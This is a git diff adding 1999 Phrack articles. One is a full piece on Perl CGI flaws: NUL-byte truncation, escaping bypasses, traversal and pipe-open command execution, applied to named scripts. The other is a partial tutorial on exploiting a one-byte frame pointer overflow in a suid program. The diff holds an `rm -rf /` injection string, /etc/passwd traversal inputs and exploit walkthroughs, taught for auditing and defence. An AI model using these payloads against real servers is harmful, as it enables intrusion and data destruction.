+M*Y-QT*N(F65%OW<?72Z7Q1A!\W[`]U51(,#OUD4PL2\GD3\&(KX_$.$URM=.
+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
+JL@C):O^&&GA?_[[^??W[^O?U[^O?U[^O?U__OOY]N;__'PJ?4$8`X`$`
+`
+end
+<-->
+
+----[  EOF
+
diff --git a/phrack55/7.txt b/phrack55/7.txt
new file mode 100644
index 0000000..3125d2d
--- /dev/null
+++ b/phrack55/7.txt
@@ -0,0 +1,455 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 07 of 19  ]
+
+
+-------------------------[  Perl CGI problems  ]
+
+
+--------[  rain.forest.puppy / [ADM/Wiretrip] <rfp@wiretrip.net>  ]
+
+
+----------------[  Intro
+
+I guess I should have an intro as to what this is about.  Mostly, I've been
+coding and auditing various CGIs, and was trying to figure out how to leverage
+a few problems I thought were holes.  So whatever, I'll shutup and get onto
+the holes.
+
+
+----------------[  The Beef
+
+----[  Poison NULL byte
+
+Note:  The name `Poison NULL byte` was originally used by Olaf Kirch in a
+Bugtraq post. I liked it, and it fit...  So I used.  Greetings to Olaf.
+
+When does "root" != "root", but at the same time, "root" == "root" (Confused
+yet)?  When you co-mingle programming languages.
+
+One night I got to wondering, exactly what would Perl allow, and could I get
+anything to blow up in unexpected ways.  So I started piping very weird data
+out to various system calls and functions.  Nothing spectacular, except for
+one that was quite notable...
+
+You see, I wanted to open a particular file, "rfp.db".  I used a fake web
+scenario to get an incoming value "rfp", tacked on a ".db", and then opened
+the file.  In Perl, the functional part of the script was something like:
+
+	# parse $user_input
+	$database="$user_input.db";
+	open(FILE "<$database");
+
+Great.  I pass 'user_input=rfp', and the script tries to open "rfp.db".  
+Pretty simple (let's ignore the obvious /../ stuff right now).
+
+Then it got interesting when I passed 'user_input=rfp%00'.  Perl made 
+$database="rfp\0.db", and then tried to open $database.  The results?  It 
+opened "rfp" (or would have, had it existed).  What happened to the ".db"?  
+This is the interesting part.
+
+You see, Perl allows NUL characters in its variables as data.  Unlike C,
+NUL is not a string delimiter.  So, "root" != "root\0".  But, the underlying
+system/kernel calls are programmed in C, which DOES recognize NUL as a
+delimiter.  So the end result?  Perl passes "rfp\0.db", but the underlying libs
+stop processing when they hit the first (our) NUL.
+
+What if we had a script that allowed trusted junior admins to change passwords
+on anyone's account EXCEPT root?  The code could be:
+
+	$user=$ARGV[1]  # user the jr admin wants to change
+	if ($user ne "root"){
+		# do whatever needs to be done for this user }
+
+	(**NOTE: this is here in WAY simplistic form & theory just to 
+		illustrate the point)
+
+So, if the jr. admin tries 'root' as the name, it won't do anything.  But, if
+the jr. admin passes 'root\0', Perl will succeed the test, and execute the
+block.  Now, when systems calls are piped out (unless it's all done in Perl,
+which is possible, but not likely), that NUL will be effectively dropped, and
+actions will be happening on root's record.
+
+While this is not necessarily a security problem in itself, it is definitely
+an interesting feature to watch for.  I've seen many CGIs that tack on a
+".html" to some user-submitted form data for the resulting page.  I.e. 
+	
+	page.cgi?page=1 
+
+winds up showing me 1.html.  Semi-secure, because it adds ".html" page, so
+you'd think, at worst, it'd only show HTML pages.  Well, if we send it 
+
+	page.cgi?page=page.cgi%00      (%00 == '\0' escaped)
+
+then the script will wind up feeding us a copy of its own source!  Even a
+check with Perl's '-e' will fail:
+
+	$file="/etc/passwd\0.txt.whatever.we.want";
+	die("hahaha!  Caught you!) if($file eq "/etc/passwd");
+	if (-e $file){
+		open (FILE, ">$file");}
+
+This will succeed (if there is, in fact, an /etc/passwd), and open it for
+writing.
+
+Solution?  Simple!  Remove NULs.  In Perl, it's as simple as
+	
+	$insecure_data=~s/\0//g;
+
+Note: don't escape them with the rest of the shell metacharacters.  Completely
+remove them.
+
+----[ (Back)slash and burn
+
+If you take a look at the W3C WWW Security FAQ, you'll see the recommended
+list of shell metacharacters is:
+
+	&;`'\"|*?~<>^()[]{}$\n\r
+
+What I find the most interesting is everyone seems to forget about the
+backslash  ('\').  Maybe it's just the way you need to write the escape code
+in Perl:
+
+	s/([\&;\`'\\\|"*?~<>^\(\)\[\]\{\}\$\n\r])/\\$1/g;
+
+With all those backslashes escaping [](){}, etc., it gets confusing to make
+sure that the backslash is also accounted for (here, it's '\\').  Perhaps
+some people are just regex-dyslexic, and think that by seeing one instance of
+backslash it's accounted for.
+
+So, of course, why is this important?  Imagine if you have the following line
+submitted to your CGI:
+
+	user data `rm -rf /`
+
+You run it through your Perl escape code, which turns it into:
+
+	user data \`rm -rf /\`
+
+Which is now safe to use in shell operations, etc.  Now, let's say your forgot
+to escape out backslashes.  The user submits the following line:
+
+	user data \`rm -rf / \`
+
+Your code changes it to:
+
+	user data \\`rm -rf / \\`
+
+The double backslashes will turn into a single 'data' backslash, leaving the
+backticks unescaped.  This will then effectively run `rm -rf / \`.  Of course,
+with this method, you'll always have spurious backslashes to deal with.
+Leaving the backslash as the last character on the line will cause Perl to
+error out on system and backtick calls (at least, in my testing it did).
+You'll have to be sneaky to get around this.  ;)  (It is possible...)
+
+Another interesting backslash side-effect comes from the following code to
+prevent reverse directory transversals:
+
+	s/\.\.//g;
+
+All it does is remove double dots, effectively squashing reverse transversal
+of a file.  So,
+	
+	/usr/tmp/../../etc/passwd
+
+will become
+
+	/usr/tmp///etc/passwd
+
+which doesn't work (Note: multiple slashes are allowed.  Try 'ls -l
+/etc////passwd')
+
+Now, enter our friend the backslash.  Let's give the line
+
+	/usr/tmp/.\./.\./etc/passwd
+
+the regex expression will not match due to the backslash.  Now, go to use that
+filename in Perl
+
+	$file="/usr/tmp/.\\./.\\./etc/passwd";
+	$file=s/\.\.//g;
+	system("ls -l $file");
+
+Note: we need to use double backslashes to get Perl to insert only one 'data'
+backslash -- otherwise Perl assumes you're just escaping the periods.
+Datawise, the string is still "/usr/tmp/.\./.\./etc/passwd".
+
+However, the above only works on system and backtick calls.  Perl's '-e' and
+open (non-piped) functions do NOT work.  Hence:
+
+	$file="/usr/tmp/.\\./.\\./etc/passwd";
+	open(FILE, "<$file") or die("No such file");
+
+will die with "No such file".  My guess is because the shell is needed to
+process the '\.' into '.' (as an escaped period is still just a period).
+
+Solution?  Make sure you escape the backslash.  Simple enough.
+
+
+----[  That pesky pipe
+
+In Perl appending a '|' (pipe) onto the end of a filename in a open statement
+causes Perl to run the file specified, rather than open it.  So,
+
+	open(FILE, "/bin/ls")
+
+will get you a lot of binary code, but
+
+	open(FILE, "/bin/ls|")
+
+will actually run /bin/ls.  Note that the following regex
+
+	s/(\|)/\\$1/g
+
+will prevent this (Perl dies with a 'unexpected end of file', due to sh
+wanting the nextline indicated by the trailing '\'.  If you find a way
+around this, let me know).
+
+Now we can complex the situation with the other techniques we just learned
+above.  Let's assume $FORM is raw user-submitted input to the CGI.  First,
+we have:
+
+	open(FILE, "$FORM")
+
+which we can set $FORM to "ls|" to get the directory listing.  Now, suppose we
+had:
+
+	$filename="/safe/dir/to/read/$FORM"
+	open(FILE, $filename)
+
+then we need to specifically specify where "ls" is, so we set $FORM to
+"../../../../bin/ls|", which gives us a directory listing.  Since this is
+a piped open, our backslash technique to get around anti-reverse-traversal
+regex's may be possibly used, if applicable.
+
+Up to this point we can use command line options with command.  For example,
+using the above code snippet, we could set $FORM to "touch /myself|" to
+create the file /myself (sorry, couldn't resist the filename. :)
+
+Next, we have a little harder situation:
+
+	$filename="/safe/dir/to/read/$FORM"
+	if(!(-e $filename)) die("I don't think so!")
+	open(FILE, $filename)
+
+Now we need to fool the '-e'.  Problem is that '-e' will come back as not
+exist if it tries to find 'ls|', because it is looking for the filename with
+the actual pipe on the end.  So, we need to 'remove' the pipe for the '-e'
+check, but still have Perl see it.  Anything come to mind?  Poison NULL to
+the rescue!  All we need to do is set $FORM to "ls\0|" (or, in escaped web
+GET form, "ls%00|").  This causes the '-e' to check for "ls" (it stops
+processing at our NUL, ignoring the pipe).  However, Perl still sees the pipe
+at the end come time to open our file, so it will run our command.  There's
+one catch, however...when Perl executes the our command, it stops at our NULL
+-- this means we can't specify command line options.  Maybe examples will
+better illustrate:
+
+	$filename="/bin/ls /etc|"
+	open(FILE, $filename)
+
+This gives as a listing of the /etc directory.
+
+	$filename="/bin/ls /etc\0|"
+	if(!(-e $filename)) exit;
+	open(FILE, $filename)
+
+This will exit because '-e' sees "/bin/ls /etc" doesn't exist.
+
+	$filename="/bin/ls\0 /etc|"
+	if(!(-e $filename)) exit;
+	open(FILE, $filename)
+
+This will work, except we'll only get the listing of our current directory
+(a plain 'ls')...it will not feed the '/etc' to ls as an argument.
+
+<rant> I also want to make a note for you code junkies: if you lazy 
+Perl programmers (not *ALL* Perl programmers; just the lazy ones) would
+take the extra time to make your mind up and specify a specific file mode,
+it would render this bug moot. </rant>
+
+	$bug="ls|"
+	open(FILE, $bug)
+	open(FILE, "$bug")
+
+work. But
+	
+	open(FILE, "<$bug")
+	open(FILE, ">$bug")
+	open(FILE, ">>$bug")
+	etc..etc..
+
+won't work.  So if you want to read in a file, then open "<$file", not just
+$file.  Inserting that less-then sign (one measly character!) can save
+you and your server a lot of grief. </rant>
+
+Ok, now that we have a few weapons, let's go engage the enemy.
+
+
+----------------[  Real life (insecure) Perl scripts
+
+Our first CGI I snagged off of freecode.com.  It's a classified ad manager
+script.  From the CGI file:
+
+	#       First version 1.1
+	#       Dan Bloomquist dan@lakeweb.net
+
+Now the first example...Dan parses all incoming form variables into %DATA.
+He doesn't strip '..', nor NUL characters.  So, let's take a peek at a
+snippet of code:
+
+	#This sets the real paths to the html and lock files.
+	#It is done here, after the POST data is read.
+	#of the classified page.
+	$pageurl= $realpath . $DATA{ 'adPath' } . ".html";
+	$lockfile= $realpath . $DATA{ 'adPath' } . ".lock";
+
+Using 'adPath=/../../../../../etc/passwd%00' we can specify $pageurl to
+point to the /etc/passwd file.  Ditto for the $lockfile.  We can't use the
+appended pipe, because he appends the ".html"/".lock" afterwards (well,
+you CAN use it, but it's not going to work. ;)
+
+	#Read in the classified page
+	open( FILE,"$pageurl" ) || die "can't open to read 
+		$pageurl: $!\n";
+	@lines= <FILE>;
+	close( FILE );
+
+Here Dan reads in $pageurl, which is the file we specified.  Fortunately
+for Dan, he then immediately opens $pageurl for write.  So whatever we
+specify to read, we also need rights to write it.  This does limit the
+exploitation potential.  But it serves as a great real-life example of
+this type of problem.
+
+Interestingly enough, Dan does go on to:
+
+	#Send your mail out.
+	#
+	      open( MAIL, "|$mailprog $DATA{ 'adEmail' }" )
+        	 || die "can't open sendmail: $adEmail: $!\n";
+
+Hmmmmm...this is your standard no-no.  And Dan doesn't parse shell
+metacharacters, so that 'adEmail' gets pretty scary.
+
+Sticking around freecode.com, I then got a simple form logger:
+
+	# flexform.cgi
+	# Written by Leif M. Wright
+	# leif@conservatives.net
+
+Leif parses form input into %contents, and doesn't escape shell
+metacharacters.  Then he does
+
+	$output = $basedir . $contents{'file'};
+	open(RESULTS, ">>$output");
+
+Using our standard reverse directory transversal, we don't even have to NUL
+out an extension.  Whatever file we specify is opened for append, so again, we
+need to get a little lucky with our permissions.  Again, our pipe bug
+won't work because he  specifically set the mode to append (via the '>>').
+
+Next is LWGate, which is a WWW interface to many popular mailing list packages.
+
+	# lwgate by David W. Baker, dwb@netspace.org # 
+	# Version 1.16 #
+
+Dave puts parsed form variables into %CGI.  Then we have
+
+	# The mail program we pipe data to
+	$temp = $CGI{'email'}; 
+	$temp =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g; 
+	$MAILER = "/usr/sbin/sendmail -t -f$temp"
+
+	open(MAIL,"| $MAILER") || &ERROR('Error Mailing Data')
+
+Hmmmm...Dave seems to have forgotten the backslash in his regex replacement.
+Not good.  
+
+Ok, let's switch to one of the many shopping cart applications.  This one,
+again, was yanked from freecode.com, Perlshop. 
+
+	$PerlShop_version = 3.1; 
+	# A product of ARPAnet Corp. - 
+		perlshop@arpanet.com, www.arpanet.com/perlshop 
+
+The interesting part is:
+
+	open (MAIL, "|$blat_loc - -t $to -s $subject") 
+		|| &err_trap("Can't open $blat_loc!\n")
+
+$to is obviously the user-defined email. Blat is a NT mail program.  Remember
+that shell metacharacters on NT are <>&|% (maybe more?).
+
+Remember the pesky pipe problem I mentioned?  (I hope you remember it...  It
+was only a few paragraphs ago!).  I admit, it's a very unlikely bug, but I
+did find it.  Let's head over to Matt's Script Archive.
+
+	# File Download                     Version 1.0  
+	# Copyright 1996 Matthew M. Wright  mattw@worldwidemart.com
+
+First he parses incoming user data into $Form (not escaping anything).  Then
+he runs the following:
+
+	$Request_File = $BASE_DIR . $Form{'s'} . '/' . $Form{'f'};
+
+	if (!(-e $filename)) {
+		&error('File Does Not Exist');
+	}
+	elsif (!(-r $filename)) {
+		&error('File Permissions Deny Access');
+	}
+
+	open(FILE,"$Request_File");
+		while (<FILE>) {
+			print;
+		}
+
+This fits the criteria for the 'pesky pipe problem' (tm).  We do have the
+'-e' check, so we don't get to use command line args.  Since he sticks
+$BASE_DIR on the front, we'll need to use reverse directory transversal.
+
+I'm sure you looking at the above (should) see a much more simpler problem.
+What if f=../../../../../../etc/passwd?  Well, if it exists, and is
+readable, it'll show it to you.  And yes, it does.  One other note: all
+accesses to download.cgi are logged by the following code:
+
+	open(LOG,">>$LOG_FILE");
+	    print LOG "$Date|$Form{'s'}|$Form{'c'}|$Form{'f'}\n";
+	close(LOG);
+
+So you'll be on candid camera for everything you do.  But you shouldn't be
+doing mean stuff to other people's servers anyways. ;)
+
+Let's fly over to BigNoseBird.com.  Script I have in mind:
+
+	bnbform.cgi
+	#(c)1997 BigNoseBird.Com
+	#  Version 2.2 Dec. 26, 1998
+
+The code of interest is after the script opens a pipe to sendmail as MAIL:
+
+	  if ($fields{'automessage'} ne "")
+	   {
+	    open (AM,"< $fields{'automessage'}");
+	    while (<AM>)
+	     {
+	      chop $_;
+	      print MAIL "$_\n";
+	     }
+
+This is another simple one.  BNB doesn't do any parsing of the user input
+variables (in $fields), so we can specify any file we want for 'automessage'.
+Assuming it's readable by the web server context, it will get mailed to
+whatever address we put (or so the theory goes).
+
+
+----------------[ Drats...That's the End
+
+Sure is.  By this time I was a little tired of wading through Perl code.  I'll
+leave it as an exercise for all of you to go find more.  And if you do,
+drop me a line--especially if you find some scripts that you can make use
+of the 'pesky pipe problem'.  Anyways, that's all I wrote for this one, so
+till next time people.
+
+.rain.forest.puppy. [ADM/Wiretrip]  rfp@wiretrip.net
+
+Greets can be found at http://www.el8.org/~rfp/greets.html
+
+----[  EOF
diff --git a/phrack55/8.txt b/phrack55/8.txt
new file mode 100644
index 0000000..c985b0e
--- /dev/null
+++ b/phrack55/8.txt
@@ -0,0 +1,508 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 08 of 19  ]
+
+
+-------------------------[  The Frame Pointer Overwrite  ]
+
+
+--------[  klog <klog@promisc.org>  ]
+
+
+----[  Introduction
+
+Buffers can be overflowed, and by overwriting critical data stored in the
+target process's address space, we can modify its execution flow.  This is
+old news.  This article is not much about how to exploit buffer overflows,
+nor does it explain the vulnerability itself.  It just demonstrates it is
+possible to exploit such a vulnerability even under the worst conditions,
+like when the target buffer can only be overflowed by one byte.  Many other
+esoteric techniques where the goal is to exploit trusted processes in
+the most hostile situations exist, including when privileges are dropped.
+We will only cover the one byte overflow here.
+
+
+----[  The object of our attack
+
+Lets write a pseudo vulnerable suid program, which we will call "suid".  It
+is written such that only one byte overflows from its buffer.
+
+	ipdev:~/tests$ cat > suid.c
+	#include <stdio.h>
+
+	func(char *sm)
+	{
+        	char buffer[256];
+        	int i;
+        	for(i=0;i<=256;i++)
+                	buffer[i]=sm[i];
+	}
+
+	main(int argc, char *argv[])
+	{
+        	if (argc < 2) {
+                	printf("missing args\n");
+                	exit(-1);
+        	}
+
+	        func(argv[1]);
+	}
+	^D
+	ipdev:~/tests$ gcc suid.c -o suid
+	ipdev:~/tests$
+
+As you can see, we won't have much space to exploit this program.  In fact, the
+overflow is caused only by one byte exceeding the buffer's storage space.  We
+will have to use this byte cleverly.  Before exploiting anything, we should
+take a look at what this byte really overwrites (you probably already know it,
+but hell, who cares). Let's reassemble the stack using gdb, at the moment the
+overflow occurs.
+
+	ipdev:~/tests$ gdb ./suid
+	...
+	(gdb) disassemble func
+	Dump of assembler code for function func:
+	0x8048134 <func>:       pushl  %ebp
+	0x8048135 <func+1>:     movl   %esp,%ebp
+	0x8048137 <func+3>:     subl   $0x104,%esp
+	0x804813d <func+9>:     nop
+	0x804813e <func+10>:    movl   $0x0,0xfffffefc(%ebp)
+	0x8048148 <func+20>:    cmpl   $0x100,0xfffffefc(%ebp)
+	0x8048152 <func+30>:    jle    0x8048158 <func+36>
+	0x8048154 <func+32>:    jmp    0x804817c <func+72>
+	0x8048156 <func+34>:    leal   (%esi),%esi
+	0x8048158 <func+36>:    leal   0xffffff00(%ebp),%edx
+	0x804815e <func+42>:    movl   %edx,%eax
+	0x8048160 <func+44>:    addl   0xfffffefc(%ebp),%eax
+	0x8048166 <func+50>:    movl   0x8(%ebp),%edx
+	0x8048169 <func+53>:    addl   0xfffffefc(%ebp),%edx
+	0x804816f <func+59>:    movb   (%edx),%cl
+	0x8048171 <func+61>:    movb   %cl,(%eax)
+	0x8048173 <func+63>:    incl   0xfffffefc(%ebp)
+	0x8048179 <func+69>:    jmp    0x8048148 <func+20>
+	0x804817b <func+71>:    nop
+	0x804817c <func+72>:    movl   %ebp,%esp
+	0x804817e <func+74>:    popl   %ebp
+	0x804817f <func+75>:    ret
+	End of assembler dump.
+	(gdb)
+
+As we all know, the processor will first push %eip into the stack, as the
+CALL instruction requires.  Next, our small program pushes %ebp over it, as
+seen at *0x8048134.  Finally, it activates a local frame by decrementing %esp
+by 0x104.  This means our local variables will be 0x104 bytes big (0x100 for
+the string, 0x004 for the integer).  Please note that the variables are
+physically padded to the first 4 bytes, so a 255 byte buffer would take up as
+much space as a 256 byte buffer.  We can now tell what our stack looked like
+before the overflow occurred:
+
+	saved_eip
+	saved_ebp
+	char buffer[255]
+	char buffer[254]
+	    ...
+	char buffer[000]
+	int i
+
+This means that the overflowing byte will overwrite the saved frame pointer,
+which was pushed into the stack at the beginning of func().  But how can this
+byte be used to modify the programs execution flow?  Let's take a look at what
+happens with %ebp's image.  We already know that it is restored at the end of
+func(), as we can see at *0x804817e.  But what next?
+
+	(gdb) disassemble main
+	Dump of assembler code for function main:
+	0x8048180 <main>:       pushl  %ebp
+	0x8048181 <main+1>:     movl   %esp,%ebp
+	0x8048183 <main+3>:     cmpl   $0x1,0x8(%ebp)
+	0x8048187 <main+7>:     jg     0x80481a0 <main+32>
+	0x8048189 <main+9>:     pushl  $0x8058ad8
+	0x804818e <main+14>:    call   0x80481b8 <printf>
+	0x8048193 <main+19>:    addl   $0x4,%esp
+	0x8048196 <main+22>:    pushl  $0xffffffff
+	0x8048198 <main+24>:    call   0x804d598 <exit>
+	0x804819d <main+29>:    addl   $0x4,%esp
+	0x80481a0 <main+32>:    movl   0xc(%ebp),%eax
+	0x80481a3 <main+35>:    addl   $0x4,%eax
+	0x80481a6 <main+38>:    movl   (%eax),%edx
+	0x80481a8 <main+40>:    pushl  %edx
+	0x80481a9 <main+41>:    call   0x8048134 <func>
+	0x80481ae <main+46>:    addl   $0x4,%esp
+	0x80481b1 <main+49>:    movl   %ebp,%esp
+	0x80481b3 <main+51>:    popl   %ebp
+	0x80481b4 <main+52>:    ret
+	0x80481b5 <main+53>:    nop
+	0x80481b6 <main+54>:    nop
+	0x80481b7 <main+55>:    nop
+	End of assembler dump.
+	(gdb)
+
+Great!  After func() has been called, at the end of main(), %ebp will be
+restored into %esp, as seen at *0x80481b1.  This means that we can set %esp to
+an arbitrary value.  But remember, this arbitrary value is not *really*
+arbitrary, since you can only modify the last %esp's byte.  Let's check to see
+if we're right.
+
+	(gdb) disassemble main
+	Dump of assembler code for function main:
+	0x8048180 <main>:       pushl  %ebp
+	0x8048181 <main+1>:     movl   %esp,%ebp
+	0x8048183 <main+3>:     cmpl   $0x1,0x8(%ebp)
+	0x8048187 <main+7>:     jg     0x80481a0 <main+32>
+	0x8048189 <main+9>:     pushl  $0x8058ad8
+	0x804818e <main+14>:    call   0x80481b8 <printf>
+	0x8048193 <main+19>:    addl   $0x4,%esp
+	0x8048196 <main+22>:    pushl  $0xffffffff
+	0x8048198 <main+24>:    call   0x804d598 <exit>
+	0x804819d <main+29>:    addl   $0x4,%esp
+	0x80481a0 <main+32>:    movl   0xc(%ebp),%eax
+	0x80481a3 <main+35>:    addl   $0x4,%eax
+	0x80481a6 <main+38>:    movl   (%eax),%edx
+	0x80481a8 <main+40>:    pushl  %edx
+	0x80481a9 <main+41>:    call   0x8048134 <func>
+	0x80481ae <main+46>:    addl   $0x4,%esp
+	0x80481b1 <main+49>:    movl   %ebp,%esp
+	0x80481b3 <main+51>:    popl   %ebp
+	0x80481b4 <main+52>:    ret
+	0x80481b5 <main+53>:    nop
+	0x80481b6 <main+54>:    nop
+	0x80481b7 <main+55>:    nop
+	End of assembler dump.
+	(gdb) break *0x80481b4
+	Breakpoint 2 at 0x80481b4
+	(gdb) run `overflow 257`
+	Starting program: /home/klog/tests/suid `overflow 257`
+
+	Breakpoint 2, 0x80481b4 in main ()
+	(gdb) info register esp
+	esp            0xbffffd45       0xbffffd45
+	(gdb)
+
+It seems we were.  After overflowing the buffer by one 'A' (0x41), %ebp is
+moved into %esp, which is incremented by 4 since %ebp is poped from the
+stack just before the RET.  This gives us 0xbffffd41 + 0x4 = 0xbffffd45.
+
+
+----[  Getting prepared
+
+What does changing the stack pointer give us?  We cannot change the saved %eip
+value directly like in any conventional buffer overflow exploitation, but we
+can make the processor think it is elsewhere.  When the processor returns
+from a procedure, it only pops the first word on the stack, guessing it is
+the original %eip.  But if we alter %esp, we can make the processor pop any
+value from the stack as if it was %eip, and thus changing the execution flow.
+Lets project to overflow the buffer using the following string:
+
+	[nops][shellcode][&shellcode][%ebp_altering_byte]
+
+In order to do this, we should first determine what value we want to alter
+%ebp (and thus %esp) with.  Let's take a look at what the stack will look like
+when the buffer overflow will have occurred:
+
+	saved_eip
+	saved_ebp (altered by 1 byte)   
+	&shellcode			\
+	shellcode			 |  char buffer 
+	nops				/
+	int i
+
+Here, we want %esp to point to &shellcode, so that the shellcode's address
+will be poped into %eip when the processor will return from main().  Now that
+we have the full knowledge of how we want to exploit our vulnerable program,
+we need to extract information from the process while running in the context
+it will be while being exploited.  This information consists of the address of
+the overflowed buffer, and the address of the pointer to our shellcode
+(&shellcode).  Let's run the program as if we wanted to overflow it with a 257
+bytes string.  In order to do this, we must write a fake exploit which will
+reproduce the context in which we exploit the vulnerable process.
+
+	(gdb) q
+	ipdev:~/tests$ cat > fake_exp.c
+	#include <stdio.h>
+	#include <unistd.h>
+
+	main()
+	{
+        	int i;
+        	char buffer[1024];
+	
+	        bzero(&buffer, 1024);
+	        for (i=0;i<=256;i++)	
+	        {
+	                buffer[i] = 'A';
+	        }
+	        execl("./suid", "suid", buffer, NULL);
+	}
+	^D
+	ipdev:~/tests$ gcc fake_exp.c -o fake_exp
+	ipdev:~/tests$ gdb --exec=fake_exp --symbols=suid
+	...
+	(gdb) run
+	Starting program: /home/klog/tests/exp2
+
+	Program received signal SIGTRAP, Trace/breakpoint trap.
+	0x8048090 in ___crt_dummy__ ()
+	(gdb) disassemble func
+	Dump of assembler code for function func:
+	0x8048134 <func>:       pushl  %ebp
+	0x8048135 <func+1>:     movl   %esp,%ebp
+	0x8048137 <func+3>:     subl   $0x104,%esp
+	0x804813d <func+9>:     nop
